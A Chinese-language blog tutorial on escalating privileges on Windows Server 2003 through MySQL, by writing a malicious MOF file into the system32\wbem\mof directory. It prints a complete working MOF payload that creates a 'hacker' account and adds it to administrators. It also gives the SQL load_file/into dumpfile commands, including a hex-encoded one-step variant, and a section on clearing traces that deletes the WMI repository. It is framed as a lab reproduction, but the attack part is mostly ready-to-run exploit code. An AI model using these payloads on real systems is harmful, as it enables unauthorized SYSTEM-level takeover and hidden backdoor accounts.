mysql mof提权

mysql mof提权

1. 前置知识

  • mysql中的secure_file_priv参数
    • 使用:
      • 当 secure_file_priv=NULL 时,是不允许mysql导出文件的
      • 当 secure_file_priv=xxx 时,是只允许mysql将文件导出到xxx目录下的
      • 当 secure_file_priv= 时,mysql可以将文件导出到任意目录下
      • 该参数在 my.ini 文件中。如要修改,只能通过my.ini文件修改,然后重启mysql。不能够通过sql语句进行修改。
    • 注意:
      • 在mysql5.5之前 secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件
      • 在mysql5.5之后 secure_file_priv默认是NULL,这个情况下不可以写文件
  • MOF文件(了解一下即可)
    • 托管对象格式(MOF)文件是创建和注册提供程序、事件类别和事件的简便方法。文件路径为:c:/windows/system32/wbme/mof/,其作用是每隔五秒就会去监控进程创建和死亡。

2. mof提权原理及利用条件

  • mof提权原理
    • C:\WINDOWS\system32\wbem\mof 目录下的mof文件每隔一段时间(几秒左右)就会被系统自动的执行,且为系统权限,因为这个mof里面有一部分是VBS脚本,所以可以利用这个VBS脚本来调用CMD执行系统命令,如果mysql有权限操作mof目录的话,就可以来执行任意命令了。
    • 由该原理我们也不难想到:这里mysql的作用就类似于一个桥梁,仅仅用来帮助我们写mof文件而执行mof文件的并不是mysql本身。那么如果存在另一个软件(或往更大的范围说:如果存在另一种方法),我们也可以通过它向C:\WINDOWS\system32\wbem\mof目录中写mof文件的话,也是可以达到同样的效果的,没必要非要是mysql。
  • 利用条件
    1. windows 03及以下版本
    2. secure-file-priv参数的值 "是空的"
    3. mysq启动身份具有权限去读写 C:\WINDOWS\system32\wbem\mof 目录

3. 提权复现

3.1 实验环境

  • 本实验环境使用的是phpstudy搭建
    • php-5.3.29-nts + apache
    • mysql版本是:5.5.53 MySQL Community Server (GPL)
    • 操作系统版本:windows 2003 sp2 enterprise edition

3.2 开始复现

  • 利用姿势其实是有两种:
    1. 第一种:我们先上传一个包含了恶意VBS代码的mof文件,再使用sql语句将上传的mof文件导出到 C:\WINDOWS\system32\wbem\mof目录下。
    2. 第二种:我们不上传mof文件,直接通过sql语句将恶意的VBS代码输出到 C:\WINDOWS\system32\wbem\mof 目录下(这个姿势在我们找不到上传点的情况下可以利用)。
  • 在这里我们假设已经拿到了网站的webshell,以及数据库的账号密码

3.2.1 第一种姿势

  1. 我们先把包含了恶意VBS代码的test.mof文件上传到 www 目录下
    mysql mof提权
  • 以下是 test.mof 文件中的恶意VBS代码
    #pragma namespace("\\\\.\\root\\subscription") 
    
    instance of __EventFilter as $EventFilter 
    { 
        EventNamespace = "Root\\Cimv2"; 
        Name  = "filtP2"; 
        Query = "Select * From __InstanceModificationEvent " 
                "Where TargetInstance Isa \"Win32_LocalTime\" " 
                "And TargetInstance.Second = 5"; 
        QueryLanguage = "WQL"; 
    }; 
    
    instance of ActiveScriptEventConsumer as $Consumer 
    { 
        Name = "consPCSV2"; 
        ScriptingEngine = "JScript"; 
        ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
    }; 
    
    instance of __FilterToConsumerBinding 
    { 
        Consumer   = $Consumer; 
        Filter = $EventFilter; 
    };
    
  1. 查看 secure_file_priv 参数,看mysql是否被允许导出文件

    • payload:
      show variables like "secure_file_priv"
      
    • 发现 mysql可以导出文件
      mysql mof提权
    • 注意:
      • 我的mysql的版本是5.5.53,该参数应该为 “secure_file_priv=NULL”,在这里为了让实验继续下去,便将参数修改为了“secure_file_priv=”
  2. 将test.mof文件中的恶意代码导出到 C:\WINDOWS\system32\wbem\mof 目录下

    • payload:
      select load_file('C:/phpStudy/WWW/test.mof') into dumpfile 'C:/WINDOWS/system32/wbem/mof/test.mof'
      
    • 可以看到,我们已经成功的将mof文件导出到 C:\WINDOWS\system32\wbem\mof 目录下了
      mysql mof提权
  3. 看我们的恶意代码是否被成功执行

    • 可以看到hack用户被成功创建,且被移动到了administrators组中
      mysql mof提权

3.2.2 第二种姿势

  • 直接通过sql语句将恶意VBS代码写入到 mof目录下
  • payload:
    select 0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020204E616D6520203D202266696C745032223B200A202020205175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A2020202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A into dumpfile "C:/windows/system32/wbem/mof/test2.mof"
    
    • 上面 sql 中 select 后面的字符串是恶意VBS代码的十六进制形式
    • 下图是执行的结果
      mysql mof提权

4. 清除痕迹

  • 因为每隔一段时间时间,mof文件会被再次执行以致重新添加用户,所以想要清理痕迹得先暂时关闭 winmgmt服务再删除相关mof文件,这个时候在删除用户才会有效果
  • 操作命令如下(已检验可以使用):
    # 停止 winmgmt 服务
    net stop winmgmt
    # 删除 Repository 文件夹
    rmdir /s /q C:\Windows\system32\wbem\Repository\
    # 手动删除 mof 文件
    del C:\Windows\system32\wbem\mof\good\test.mof /F /S
    # 删除创建的用户
    net user hacker /del
    # 重新启动服务
    net start winmgmt
    
  • 实操
    mysql mof提权

5. 参考

  1. https://blog.csdn.net/qq_45290991/article/details/117536250
  2. https://www.cnblogs.com/zzjdbk/p/12991468.html
  3. https://www.cnblogs.com/wkzb/p/13179418.html
上一篇:[白话解析] 深入浅出支持向量机(SVM)之核函数


下一篇:SVM